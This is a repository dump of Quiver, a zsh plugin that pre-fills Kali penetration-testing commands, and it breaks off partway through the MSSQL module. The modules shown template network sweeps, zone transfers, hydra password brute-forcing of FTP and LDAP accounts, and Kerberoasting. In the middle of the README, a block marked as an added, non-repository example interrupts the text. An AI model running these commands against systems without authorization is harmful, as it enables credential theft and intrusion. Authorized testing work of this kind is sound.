Repository: stevemcilwain/quiver
Branch: master
Commit: 64cc42a29341
Files: 76
Total size: 179.8 KB

Directory structure:
gitextract_8lk53koa/
├── .gitattributes
├── .gitignore
├── .vscode/
│   └── settings.json
├── LICENSE
├── README.md
├── RELEASES.md
├── VERSION
├── modules/
│   ├── qq-encoding.zsh
│   ├── qq-enum-dhcp.zsh
│   ├── qq-enum-dns.zsh
│   ├── qq-enum-ftp.zsh
│   ├── qq-enum-host.zsh
│   ├── qq-enum-kerb.zsh
│   ├── qq-enum-ldap.zsh
│   ├── qq-enum-mssql.zsh
│   ├── qq-enum-mysql.zsh
│   ├── qq-enum-network.zsh
│   ├── qq-enum-nfs.zsh
│   ├── qq-enum-oracle.zsh
│   ├── qq-enum-pop3.zsh
│   ├── qq-enum-rdp.zsh
│   ├── qq-enum-smb.zsh
│   ├── qq-enum-web-aws.zsh
│   ├── qq-enum-web-dirs.zsh
│   ├── qq-enum-web-eslastic.zsh
│   ├── qq-enum-web-fuzz.zsh
│   ├── qq-enum-web-js.zsh
│   ├── qq-enum-web-php.zsh
│   ├── qq-enum-web-ssl.zsh
│   ├── qq-enum-web-vuln.zsh
│   ├── qq-enum-web.zsh
│   ├── qq-exploit.zsh
│   ├── qq-install.zsh
│   ├── qq-kali.zsh
│   ├── qq-log.zsh
│   ├── qq-notes.zsh
│   ├── qq-pivot.zsh
│   ├── qq-project-custom.zsh
│   ├── qq-project.zsh
│   ├── qq-recon-domains.zsh
│   ├── qq-recon-github.zsh
│   ├── qq-recon-networks.zsh
│   ├── qq-recon-org.zsh
│   ├── qq-recon-subs.zsh
│   ├── qq-scripts.zsh
│   ├── qq-shell-handlers-msf.zsh
│   ├── qq-shell-handlers.zsh
│   ├── qq-shell-tty.zsh
│   ├── qq-srv.zsh
│   ├── qq-vars-global.zsh
│   ├── qq-vars.zsh
│   └── qq.zsh
├── payloads/
│   ├── aka.ms.pem
│   ├── aliases.rc
│   ├── github-dorks-commits.txt
│   ├── msf-windows-payloads.txt
│   ├── recon-dorks-github.txt
│   ├── recon-dorks-google.txt
│   ├── resolvers.txt
│   ├── secrets-content.json
│   ├── secrets-files.json
│   ├── tcp-ports.txt
│   ├── user-agents.txt
│   ├── web-file-upload-bypass-bytes.txt
│   ├── web-file-upload-bypass.txt
│   ├── wordlist-api.txt
│   └── wordlists.txt
├── quiver.code-workspace
├── quiver.plugin.zsh
├── scripts/
│   ├── dns-reverse-brute.zsh
│   ├── image-gen.js
│   ├── recon.zsh
│   ├── webrecon.zsh
│   ├── wildcards.py
│   └── wildcards.sh
└── system/
    └── hidpi.sh

================================================
FILE CONTENTS
================================================
================================================
FILE: .gitattributes
================================================
# Auto detect text files and perform LF normalization
* text=auto

================================================
FILE: .gitignore
================================================
# ignore qq-custom.zsh module
modules/qq-custom.zsh
log.txt
remote_checked.txt
remote_ver.txt

================================================
FILE: .vscode/settings.json
================================================
{
    "editor.detectIndentation": false
}

================================================
FILE: LICENSE
================================================
MIT License

Copyright (c) 2020 Steve McIlwain

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: README.md
================================================
# Quiver : A Meta-Tool for Kali Linux

Quiver is an organized namespace of shell functions that pre-fill commands in your terminal so that you can ditch your reliance on notes, copying, pasting, editing, copying and pasting again.

Quiver helps you remember how to use every tool in your arsenal and doesn't hide them behind scripting that can be cumbersome to maintain or update. Instead you can use Quiver to build a composable, on-the-fly workflow for every situation.

Quiver doesn't cover all tools; it's my own curated collection which I am still adding to and updating. There are so many tools for many different types of engagements and targets, so I just try to focus on tools that are maintained and current. Feel free to ask for the inclusion of tools you prefer in the issues list.

# Release 1.0

After months of hard work during lockdown, I am happy to introduce the 1.0 release of Quiver! This version contains many improvements over previous versions such as per-namespace help and installers, auto-fill variables such as RHOST, RPORT, LHOST, LPORT, PROJECT, WORDLIST, URL and global configuration settings for customizing settings like a menu of your favorite wordlists.

If you've been using Quiver before now, then many of the changes in 1.0 are breaking changes. Please familiarize yourself with the new commands using `qq-help`. If you previously were storing Quiver values in .zshrc, most of these can now be stored as global vars using `qq-vars-global`.
* [RELEASES.md](RELEASES.md)

# Features

* Prefills the commands within a terminal
* Well-organized commands with tab auto-completion
* Installs as a ZSH / Oh-My-ZSH shell plugin
* Customizable settings, global variables
* Recon phase commands for OSINT
* Enumeration of common services
* Web enumeration, brute-forcing and hacking
* Exploit compilation helpers
* Reverse shell handlers
* Content serving commands
* Built-in logbook for on-the-fly notes, saving commands
* Render markdown notes to the command line
* Kali Linux system management
* Update notification and install
* Installers for dependencies

# Installation

Quiver requires the following:

* ZSH (apt-get install zsh)
* oh-my-zsh (optional requirement but recommended: https://ohmyz.sh/)
* Kali Linux (https://kali.org)

Clone the repo to your OMZ custom plugins folder.

```bash
git clone https://github.com/stevemcilwain/quiver.git ~/.oh-my-zsh/custom/plugins/quiver
```

Edit ~/.zshrc to load the plugin.

```
plugins=(git quiver)
```

Source .zshrc to load the plugin and you're done. On first load, Quiver will install a few core packages.

```
source ~/.zshrc
```

## Getting Started

Quiver organizes commands into namespaces starting with `qq-`, such as `qq-enum-web` or `qq-recon-domains`. To see an overview of all namespaces simply use `qq-help`. Each namespace also has its own help command, such as `qq-enum-web-help`, that provides a listing of available commands. All commands support tab completion and search.

## Installing Dependencies

Every namespace has a `qq-<namespace>-install` command (for example `qq-enum-web-install`) that will install all of the tools relevant to that namespace. You can install just the tools you need, or use `qq-install-all` to run the installers of all namespaces.

## Workflow

Quiver is meant to provide a composable, on-the-fly workflow. It replaces the common painful raw workflow of reading your notes, finding a command, copy, paste, replace the values with target values, copy, paste, run.
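The mechanism behind every `qq-` command is the same: gather whatever values are missing, then `print -z` the finished command line into the editing buffer so you review and edit it before it runs. The following is an added example, not code from the Quiver repository: a small custom module in the same layout as the shipped ones, intended for `modules/qq-custom.zsh` (the path the project's .gitignore reserves for local additions). It uses only zsh builtins, awk and `host` instead of the repo's `__check-*`/`__askvar` helpers so it can be read and tried on its own; the command names, the masscan sample line in the comments and the output paths are assumptions. It shows two follow-ups the shipped modules leave to the operator: turning the masscan `-oL` output from `qq-enum-host-masscan-all-tcp` or `qq-enum-network-masscan-top` into a targeted `nmap -sV -sC` run, and attempting a zone transfer against every authoritative name server rather than the single `__RHOST` that `qq-enum-dns-host-txfr` uses.

```zsh
#!/usr/bin/env zsh

#############################################################
# qq-custom (added example, not shipped with Quiver)
#############################################################
# Same layout as the modules/ directory: a -help heredoc, an -install
# command, and commands that gather missing values and then `print -z`
# the finished command line into the editing buffer so it can be checked
# and edited before it runs. Only zsh builtins, awk and host are used; the
# repo's __check-*/__askvar helpers from qq.zsh are deliberately not relied on.

qq-custom-help() {
    cat << "DOC"
qq-custom
---------
Example custom namespace: follow-ups to the qq-enum-host/qq-enum-network
masscan sweeps and the qq-enum-dns zone transfer command.

Commands
--------
qq-custom-install:        installs dependencies
qq-custom-masscan-hosts:  print "host port,port,..." for each host in a masscan -oL file
qq-custom-masscan-nmap:   prefill nmap -sV -sC against exactly the ports masscan found open
qq-custom-dns-axfr-all:   prefill a zone transfer attempt against every NS of a domain

DOC
}

qq-custom-install() {
    sudo apt-get install -y nmap masscan dnsutils
}

# masscan -oL writes one record per open port, for example (constructed sample):
#   open tcp 22 10.0.0.5 1591300000
# Collapse that to one line per host with its ports comma-joined, the form
# nmap -p accepts. Only "open tcp" records are kept; udp and banner lines are dropped.
qq-custom-masscan-hosts() {
    local file=${1:?"usage: qq-custom-masscan-hosts <masscan -oL file>"}
    awk '$1 == "open" && $2 == "tcp" {
             ports[$4] = ($4 in ports) ? ports[$4] "," $3 : $3
         }
         END { for (h in ports) print h, ports[h] }' "$file" | sort
}

# One nmap command per host, limited to the ports masscan confirmed open: far
# less noise and time than -p- with -sV, using the -oA naming the shipped modules use.
qq-custom-masscan-nmap() {
    local file=$1 outdir=${2:-.}
    # same idea as qq-vars-set-*: prompt only for what was not supplied
    [[ -z $file ]] && read "file?Path to masscan -oL output: "
    [[ -r $file ]] || { print -u2 "cannot read ${file}"; return 1; }
    local host ports cmd=""
    while read -r host ports; do
        cmd+="sudo nmap -vvv -n -Pn -sS -sV -sC -p${ports} ${host} -oA ${outdir}/nmap-${host}; "
    done < <(qq-custom-masscan-hosts "$file")
    [[ -z $cmd ]] && { print -u2 "no open tcp ports in ${file}"; return 1; }
    print -z "${cmd%; }"   # push to the line editor instead of executing
}

# qq-enum-dns-host-txfr tries AXFR against the single __RHOST; a zone that is
# locked down on the primary is sometimes still transferable from a secondary,
# so build one attempt per authoritative server.
qq-custom-dns-axfr-all() {
    local domain=$1
    [[ -z $domain ]] && read "domain?Domain: "
    local ns cmd=""
    # `host -t ns example.com` prints lines such as
    #   example.com name server ns1.example.com.
    # keep the last field and strip the trailing dot
    for ns in $(host -t ns "$domain" | awk '/name server/ { sub(/\.$/, "", $NF); print $NF }'); do
        cmd+="host -l ${domain} ${ns}; "
    done
    [[ -z $cmd ]] && { print -u2 "no NS records found for ${domain}"; return 1; }
    print -z "${cmd%; }"
}
```

Drop the file in `modules/`, re-source `.zshrc`, and run `qq-custom-masscan-nmap` with the path of any `-oL` file written by the masscan commands; the nmap command line appears in your prompt ready to edit, exactly like the shipped commands. Keep the `-n -Pn` flags: masscan has already established the hosts are up, so there is no reason to let nmap probe or resolve them again.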
Some rely heavily on completely automated scripts or frameworks that run all the commands for a workflow and output well-formatted data. While these scripts are great for many use cases, they can often be brittle, hide the underlying tools and techniques and be cumbersome to modify. Instead, Quiver gives you a happy medium: you can run commands quickly and easily with well-organized output, composing your workflow as you go depending on the targets and context.

## Example Workflow

Here is an example workflow for bug bounty hunting:

### Prep

```bash
# if you have markdown notes, configure the path
qq-vars-global-set-notes

# set some session variables for the bounty target
qq-vars-set-project
qq-vars-set-domain

# generate scope files from the bounty url
qq-project-rescope

# save vars for other terminal sessions, qq-vars-load
qq-vars-save
```

### Passive Recon

```bash
# search for target files
qq-recon-org-files

# search downloaded files for urls
qq-recon-org-files-urls

# mine github repos for secrets
qq-recon-github-gitrob

# check dns records
qq-enum-dns-dnsrecon

# look for ASNs and networks
qq-recon-networks-amass-asns
qq-recon-networks-bgpview-ipv4

# get subdomains
qq-recon-subs-subfinder

# resolve and parse subdomains
qq-recon-subs-resolve-massdns
qq-recon-subs-resolve-parse
```

### Active Web Enumeration

```bash
# Download robots.txt
qq-enum-web-dirs-robots

# ID a WAF if present
qq-enum-web-waf

# Parse SSL certs
qq-enum-web-ssl-certs

# Spider the site
qq-enum-web-gospider

# Brute force URIs
qq-enum-web-dirs-ffuf

# Read your notes
qq-notes
```

================================================
FILE: RELEASES.md
================================================
# Releases

## 1.0 6/4/2020

Complete refactor and reorganization, including:

* Added qq-<namespace>-help commands to all modules
* Added qq-<namespace>-install commands to all modules
* More variables that auto-populate in qq-vars
* Persistent variables in qq-vars-global for customization of settings
* New qq-shell namespaces
* Better organization in qq-recon namespaces
* qq-bounty consolidated into qq-project, custom project commands moved to qq-project-custom
* qq-notes updated with more features
* New qq-kali namespace added with system commands
* qq-install refactored to include custom installers
* New qq-exploit namespace added
* New qq-enum-* namespaces added for more services

## 0.16 3/28/2020

* Fixed qq-bounty.zsh
* Fixed qq-project.zsh: logfile and output settings
* Fixed qq-vars.zsh recursively creating directories in __OUTPUT

## 0.15 3/24/2020

* Added qq-enum-mssql.zsh
* Added qq-enum-mysql.zsh
* Added qq-enum-oracle.zsh
* Added qq-enum-nfs.zsh
* Added qq-enum-pop3.zsh
* qq-srv.zsh: added 3 new listeners for tar, nc>file and b64

## 0.14 3/24/2020

* quiver.plugin.zsh: added zstyle tab autocompletion
  * use qq- to search for commands across any namespace
* qq-install.zsh
  * added jsbeautifier
* qq-vars.zsh: set-output will now create the root directory if missing

## 0.12 3/22/2020

* qq-vars.zsh: Added global variables for the most common arguments, load and save
* qq-srv.zsh: added updog
* qq-project.zsh added folder scaffolding for projects / engagements
* qq-log.zsh integration with qq-vars
* Major change to output on all methods, uses $__OUTPUT as the directory from qq-vars.zsh
* Lots of minor changes

## 0.11 - 3/9/2020

* You can now specify a path to your markdown notes by setting $__NOTES
* qq-notes.zsh: notes search and display
* qq-exploit.zsh: compilation helpers
* qq-enum-web-php: php specific enumeration such as lfi, rfi and scans
* minor fixes

## 0.10 - 3/4/2020

* Added module: qq-enum-kerb.zsh for kerberos enumeration functions
* Added module: qq-enum-rdp.zsh for RDP enumeration functions
* Added module: qq-enum-smb.zsh for SMB enumeration functions
* Added qq-debug to print ~/.quiver/log.txt
* Fixed glow commands to not use pager, leaving the output available in the console window

## 0.9 - 3/4/2020

* Minor fixes and improvements
* Added scripts/recon.zsh
* Added qq-bounty for bug bounty helpers
* Added rescope to install script and qq-bounty
* Added qq-enum-ldap
* Removed noisy banner and log loading to ./quiver/log.txt
* Added qq-enum-ftp-notes-vsftp
* Added qq-custom.zsh module for your custom aliases and functions (ignored)
* Added .gitignore (for qq-custom.zsh)

## 0.8 - 2/25/2020

* qq-pivot: added ssh tunneling commands
* qq-log: added short aliases
* qq-enum-web: moved fuzzing to qq-enum-web-fuzz
* qq-enum-web-fuzz: added/grouped (not dirs) fuzzing commands
* qq-enum-web-xss: added XSS helpers
* qq-enum-web-ssl: added SSL commands and notes
* qq-aliases: better organization, added aliases for custom functions

================================================
FILE: VERSION
================================================
1.0.0

================================================
FILE: modules/qq-encoding.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-encoding
#############################################################

qq-encoding-help() {
    cat << "DOC"
qq-encoding
----------
The encoding namespace provides commands for encoding and decoding values.

Commands
--------
qq-encoding-file-to-b64:     encodes plain text file to base64, optional $1 as file
qq-encoding-file-from-b64:   decodes base64 file to plain text, optional $1 as file

DOC
}

qq-encoding-file-to-b64() {
    if [ "$#" -eq "1" ]
    then
        print -z "cat $1 | base64 > $1.b64"
    else
        local f && __askpath f FILE $(pwd)
        print -z "cat ${f} | base64 > ${f}.b64"
    fi
}

qq-encoding-file-from-b64() {
    if [ "$#" -eq "1" ]
    then
        print -z "cat $1 | base64 -d > $1.txt"
    else
        local f && __askpath f FILE $(pwd)
        print -z "cat ${f} | base64 -d > ${f}.txt"
    fi
}

================================================
FILE: modules/qq-enum-dhcp.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-enum-dhcp
#############################################################

qq-enum-dhcp-help() {
    cat << "DOC"
qq-enum-dhcp
-------------
The qq-enum-dhcp namespace contains commands for scanning and enumerating DHCP servers.

Commands
--------
qq-enum-dhcp-install:          installs dependencies
qq-enum-dhcp-nmap-sweep:       scan a network for services
qq-enum-dhcp-tcpdump:          capture traffic to and from a host
qq-enum-dhcp-discover-nmap:    broadcast DHCP discover packets

DOC
}

qq-enum-dhcp-install() {
    __info "Running $0..."
    __pkgs tcpdump nmap
}

# named -nmap-sweep to match the help text and the other qq-enum-* modules
qq-enum-dhcp-nmap-sweep() {
    __check-project
    qq-vars-set-network
    print -z "sudo nmap -n -Pn -sU -p67 ${__NETWORK} -oA $(__netpath)/dhcp-sweep"
}

qq-enum-dhcp-tcpdump() {
    __check-project
    qq-vars-set-iface
    qq-vars-set-rhost
    # DHCP runs between udp/67 (server) and udp/68 (client): match either port
    print -z "sudo tcpdump -i ${__IFACE} 'host ${__RHOST} and udp and (port 67 or port 68)' -w $(__hostpath)/dhcp.pcap"
}

qq-enum-dhcp-discover-nmap() {
    print -z "sudo nmap -v --script broadcast-dhcp-discover"
}

================================================
FILE: modules/qq-enum-dns.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-enum-dns
#############################################################

qq-enum-dns-help() {
    cat << "DOC"
qq-enum-dns
-------------
The qq-enum-dns namespace contains commands for scanning and enumerating DNS records and servers.
Commands are executed against specific name servers (__RHOST) rather than public resolvers.

Commands
--------
qq-enum-dns-install:            installs dependencies
qq-enum-dns-nmap-sweep:         scan a network for services
qq-enum-dns-tcpdump:            capture traffic to and from a host
qq-enum-dns-host-txfr:          attempt a zone transfer
qq-enum-dns-host-all:           list all types
qq-enum-dns-host-txt:           list txt records
qq-enum-dns-host-mx:            list mx records
qq-enum-dns-host-ns:            list ns records
qq-enum-dns-host-srv:           list srv records
qq-enum-dns-nmap-ad:            discover Active Directory related records
qq-enum-dns-dnsrecon:           discover dns records, servers and attempt zone txfrs
qq-enum-dns-dnsrecon-reverse:   do reverse lookups on an IP network

DOC
}

qq-enum-dns-install() {
    __info "Running $0..."
    __pkgs tcpdump nmap dnsutils dnsrecon
}

qq-enum-dns-nmap-sweep() {
    __check-project
    qq-vars-set-network
    print -z "sudo nmap -n -Pn -sS -sU -p53 ${__NETWORK} -oA $(__netpath)/dns-sweep"
}

qq-enum-dns-tcpdump() {
    __check-project
    __check-iface
    qq-vars-set-rhost
    # plain "port 53" so that both UDP queries and TCP zone transfers are captured
    print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and port 53 -w $(__hostpath)/dns.pcap"
}

qq-enum-dns-host-txfr() {
    qq-vars-set-rhost
    qq-vars-set-domain
    print -z "host -l ${__DOMAIN} ${__RHOST}"
}

qq-enum-dns-host-all() {
    qq-vars-set-domain
    qq-vars-set-rhost
    print -z "host -a ${__DOMAIN} ${__RHOST}"
}

qq-enum-dns-host-txt() {
    qq-vars-set-domain
    qq-vars-set-rhost
    print -z "host -t txt ${__DOMAIN} ${__RHOST}"
}

qq-enum-dns-host-mx() {
    qq-vars-set-domain
    qq-vars-set-rhost
    print -z "host -t mx ${__DOMAIN} ${__RHOST}"
}

qq-enum-dns-host-ns() {
    qq-vars-set-domain
    qq-vars-set-rhost
    print -z "host -t ns ${__DOMAIN} ${__RHOST}"
}

qq-enum-dns-host-srv() {
    qq-vars-set-domain
    qq-vars-set-rhost
    print -z "host -t srv ${__DOMAIN} ${__RHOST}"
}

qq-enum-dns-nmap-ad() {
    __check-project
    qq-vars-set-domain
    qq-vars-set-rhost
    # nmap has no bare -o; -oN writes normal output to the file
    print -z "nmap --script dns-srv-enum --script-args dns-srv-enum.domain=${__DOMAIN} ${__RHOST} -oN $(__dompath)/nmap-AD.txt"
}

qq-enum-dns-dnsrecon() {
    __check-project
    qq-vars-set-domain
    qq-vars-set-rhost
    print -z "dnsrecon -d ${__DOMAIN} -n ${__RHOST} -a -s -w -z --threads 10 -c $(__dompath)/dns.csv"
}

qq-enum-dns-dnsrecon-reverse() {
    __check-project
    qq-vars-set-rhost
    # the reverse sweep runs over __NETWORK, so make sure it is set too
    qq-vars-set-network
    mkdir -p ${__PROJECT}/domains
    print -z "dnsrecon -r ${__NETWORK} -n ${__RHOST} -c ${__PROJECT}/domains/revdns.csv"
}

================================================
FILE: modules/qq-enum-ftp.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-enum-ftp
#############################################################

qq-enum-ftp-help() {
    cat << "DOC"
qq-enum-ftp
-------------
The qq-enum-ftp namespace contains commands for scanning and enumerating FTP servers.

Commands
--------
qq-enum-ftp-install:        installs dependencies
qq-enum-ftp-nmap-sweep:     scan a network for services
qq-enum-ftp-tcpdump:        capture traffic to and from a host
qq-enum-ftp-hydra:          brute force passwords for a user account
qq-enum-ftp-lftp-grep:      search (grep) the target system
qq-enum-ftp-wget-mirror:    mirror the FTP server locally

DOC
}

qq-enum-ftp-install() {
    __info "Running $0..."
    __pkgs tcpdump nmap hydra ftp lftp wget
}

# named -nmap-sweep to match the help text and the other qq-enum-* modules
qq-enum-ftp-nmap-sweep() {
    __check-project
    qq-vars-set-network
    print -z "sudo nmap -n -Pn -sS -p21 ${__NETWORK} -oA $(__netpath)/ftp-sweep"
}

qq-enum-ftp-tcpdump() {
    __check-project
    qq-vars-set-iface
    qq-vars-set-rhost
    print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 21 -w $(__hostpath)/ftp.pcap"
}

qq-enum-ftp-hydra() {
    __check-project
    qq-vars-set-rhost
    __check-user
    # -e needs its argument: n (null), s (same as login), r (reversed login)
    print -z "hydra -l ${__USER} -P ${__PASSLIST} -e nsr -o $(__hostpath)/ftp-hydra-brute.txt ${__RHOST} ftp"
}

qq-enum-ftp-lftp-grep() {
    qq-vars-set-rhost
    local q && __askvar q QUERY
    # run find inside lftp (anonymous login by default) and filter its listing
    print -z "lftp -e \"find | grep -i '${q}'; quit\" ${__RHOST}"
}

qq-enum-ftp-wget-mirror() {
    __warn "The destination site will be mirrored in the current directory"
    qq-vars-set-rhost
    local u && __prefill u USER "anonymous"
    local p && __prefill p PASSWORD "anonymous@example.com"
    print -z "wget --mirror ftp://${u}:${p}@${__RHOST}"
}

================================================
FILE: modules/qq-enum-host.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-enum-host
#############################################################

qq-enum-host-help() {
    cat << "DOC"
qq-enum-host
-------------
The qq-enum-host namespace contains commands for scanning and enumerating an individual host.

Commands
--------
qq-enum-host-install:               installs dependencies
qq-enum-host-tcpdump:               capture traffic to and from a host
qq-enum-host-nmap-top:              syn scan of the top 1000 ports
qq-enum-host-nmap-top-discovery:    syn scan of the top 1000 ports with versioning and scripts
qq-enum-host-nmap-all:              syn scan all ports
qq-enum-host-nmap-all-discovery:    syn scan all ports with versioning and scripts
qq-enum-host-nmap-udp:              udp scan top 100 ports
qq-enum-host-masscan-all-tcp:       scan all tcp ports
qq-enum-host-masscan-all-udp:       scan all udp ports
qq-enum-host-nmap-lse-grep:         search nmap lse scripts
qq-enum-host-ip:                    look up details of a public IP address

DOC
}

qq-enum-host-install() {
    __info "Running $0..."
    __pkgs tcpdump nmap masscan curl
}

qq-enum-host-tcpdump() {
    __check-project
    __check-iface
    qq-vars-set-rhost
    print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} -w $(__hostpath)/tcpdump.pcap"
}

qq-enum-host-nmap-top(){
    __check-project
    qq-vars-set-rhost
    print -z "sudo nmap -vvv -Pn -sS --top-ports 1000 --open ${__RHOST} -oA $(__hostpath)/nmap-top"
}

qq-enum-host-nmap-top-discovery(){
    __check-project
    qq-vars-set-rhost
    print -z "sudo nmap -vvv -Pn -sS --top-ports 1000 --open -sC -sV ${__RHOST} -oA $(__hostpath)/nmap-top-discovery"
}

qq-enum-host-nmap-all() {
    __check-project
    qq-vars-set-rhost
    print -z "sudo nmap -vvv -Pn -sS -p- -T4 --open ${__RHOST} -oA $(__hostpath)/nmap-all"
}

qq-enum-host-nmap-all-discovery() {
    __check-project
    qq-vars-set-rhost
    print -z "sudo nmap -vvv -Pn -sS -p- -sC -sV --open ${__RHOST} -oA $(__hostpath)/nmap-all-discovery"
}

qq-enum-host-nmap-udp() {
    __check-project
    qq-vars-set-rhost
    print -z "sudo nmap -v -Pn -sU --top-ports 100 -sV -sC --open ${__RHOST} -oA $(__hostpath)/nmap-udp"
}

# masscan needs raw socket access, so run it with sudo like the nmap syn scans
qq-enum-host-masscan-all-tcp() {
    __check-iface
    __check-project
    qq-vars-set-rhost
    print -z "sudo masscan -p1-65535 --open-only ${__RHOST} --rate=1000 -e ${__IFACE} -oL $(__hostpath)/masscan-all-tcp.txt"
}

qq-enum-host-masscan-all-udp() {
    __check-iface
    __check-project
    qq-vars-set-rhost
    print -z "sudo masscan -pU:1-65535 --open-only ${__RHOST} --rate=1000 -e ${__IFACE} -oL $(__hostpath)/masscan-all-udp.txt"
}

qq-enum-host-nmap-lse-grep() {
    local q && __askvar q QUERY
    print -z "ls /usr/share/nmap/scripts/* | grep -ie \"${q}\" "
}

qq-enum-host-ip() {
    __check-project
    qq-vars-set-rhost
    print -z "curl -s \"https://iplist.cc/api/${__RHOST}\" | tee $(__hostpath)/ip.json "
}

================================================
FILE: modules/qq-enum-kerb.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-enum-kerb
#############################################################

qq-enum-kerb-help() {
    cat << "DOC"
qq-enum-kerb
------------
The qq-enum-kerb namespace contains commands for scanning and enumerating kerberos records and servers.

Commands
--------
qq-enum-kerb-install:       installs dependencies
qq-enum-kerb-nmap-sweep:    scan a network for services
qq-enum-kerb-tcpdump:       capture traffic to and from a host
qq-enum-kerb-users:         enumerate domain users
qq-enum-kerb-kerberoast:    get SPN for a service account

DOC
}

qq-enum-kerb-install() {
    __info "Running $0..."
    __pkgs tcpdump nmap impacket-scripts
}

qq-enum-kerb-nmap-sweep() {
    __check-project
    qq-vars-set-network
    print -z "sudo nmap -n -Pn -sS -p88 ${__NETWORK} -oA $(__netpath)/kerb-sweep"
}

qq-enum-kerb-tcpdump() {
    __check-project
    qq-vars-set-iface
    qq-vars-set-rhost
    print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 88 -w $(__hostpath)/kerb.pcap"
}

qq-enum-kerb-users() {
    qq-vars-set-rhost
    local realm && __askvar realm REALM
    print -z "nmap -vvv -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=${realm},userdb=/usr/share/seclists/Usernames/Names/names.txt ${__RHOST}"
}

qq-enum-kerb-kerberoast() {
    __ask "Enter target AD domain (must also be set in your hosts file)"
    qq-vars-set-domain
    __ask "Enter service user account"
    __check-user
    __ask "Enter the IP address of the target domain controller"
    qq-vars-set-rhost
    # target is domain/user; the password is prompted for by impacket
    print -z "impacket-GetUserSPNs -request ${__DOMAIN}/${__USER} -dc-ip ${__RHOST} "
}

================================================
FILE: modules/qq-enum-ldap.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-enum-ldap
#############################################################

qq-enum-ldap-help() {
    cat << "DOC"
qq-enum-ldap
------------
The qq-enum-ldap namespace contains commands for scanning and enumerating Active Directory DC, GC and LDAP servers.

Commands
--------
qq-enum-ldap-install:       installs dependencies
qq-enum-ldap-nmap-sweep:    scan a network for services
qq-enum-ldap-tcpdump:       capture traffic to and from a host
qq-enum-ldap-ctx:           query ldap naming contexts
qq-enum-ldap-search-anon:   connect with anonymous bind and query ldap
qq-enum-ldap-search-auth:   connect with authenticated bind and query ldap
qq-enum-ldap-whoami:        send ldap whoami request
qq-enum-ldap-hydra:         brute force passwords for a user account

DOC
}

qq-enum-ldap-install() {
    __info "Running $0..."
    __pkgs tcpdump nmap ldap-utils hydra
}

qq-enum-ldap-nmap-sweep() {
    __check-project
    qq-vars-set-network
    # 389/636 LDAP and LDAPS, 3268/3269 Global Catalog and GC over SSL
    print -z "sudo nmap -n -Pn -sS -sU -p389,636,3268,3269 ${__NETWORK} -oA $(__netpath)/ldap-sweep"
}

qq-enum-ldap-tcpdump() {
    __check-project
    qq-vars-set-iface
    qq-vars-set-rhost
    # a packet only ever has two ports, so the filter must be "or", not "and"
    print -z "sudo tcpdump -i ${__IFACE} 'host ${__RHOST} and tcp and (port 389 or port 636 or port 3268 or port 3269)' -w $(__hostpath)/ldap.pcap"
}

qq-enum-ldap-ctx() {
    __ask "Enter the address of the target DC, GC or LDAP server"
    qq-vars-set-rhost
    # empty base with scope base is the rootDSE, which lists the naming contexts
    print -z "ldapsearch -x -H ldap://${__RHOST} -s base -b '' namingcontexts"
}

qq-enum-ldap-search-anon() {
    __ask "Enter the address of the target DC, GC or LDAP server"
    qq-vars-set-rhost
    __ask "Enter a distinguished name (DN), such as: DC=example,DC=com"
    local dn && __askvar dn DN
    print -z "ldapsearch -x -H ldap://${__RHOST} -s sub -b \"${dn}\" "
}

qq-enum-ldap-search-auth() {
    __ask "Enter the address of the target DC, GC or LDAP server"
    qq-vars-set-rhost
    __ask "Enter a distinguished name (DN), such as: DC=example,DC=com"
    local dn && __askvar dn DN
    __ask "Enter a user account with bind and read permissions to the directory"
    __check-user
    # -D is the bind identity, -W prompts for its password, -b is the search base
    print -z "ldapsearch -x -H ldap://${__RHOST} -D \"${__USER}\" -W -b \"${dn}\" \"(objectClass=*)\" "
}

qq-enum-ldap-whoami() {
    __ask "Enter the address of the target DC, GC or LDAP server"
    qq-vars-set-rhost
    # anonymous simple bind: a successful reply shows the server accepts
    # unauthenticated binds and which identity it assigns them
    print -z "ldapwhoami -x -H ldap://${__RHOST}"
}

qq-enum-ldap-hydra() {
    __check-project
    qq-vars-set-rhost
    __check-user
    # hydra's LDAP modules are ldap2/ldap3; -e needs its nsr argument
    print -z "hydra -l ${__USER} -P ${__PASSLIST} -e nsr -o $(__hostpath)/ldap-hydra-brute.txt ${__RHOST} ldap3"
}

================================================
FILE: modules/qq-enum-mssql.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-enum-mssql
#############################################################

qq-enum-mssql-help() {
    cat << "DOC"
qq-enum-mssql
-------------
The qq-enum-mssql namespace contains commands for scanning and enumerating MS SQL Server services and databases.

Commands
--------
qq-enum-mssql-install:            installs dependencies
qq-enum-mssql-nmap-sweep:         scan a network for services
qq-enum-mssql-tcpdump:            capture traffic to and from a host
qq-enum-mssql-sqsh:               make an interactive database connection
qq-enum-mssql-impacket-client:    connect using impacket as a sql client
qq-enum-mssql-hydra:              brute force passwords for a user account

DOC
}

qq-enum-mssql-install() {
    __info "Running $0..."
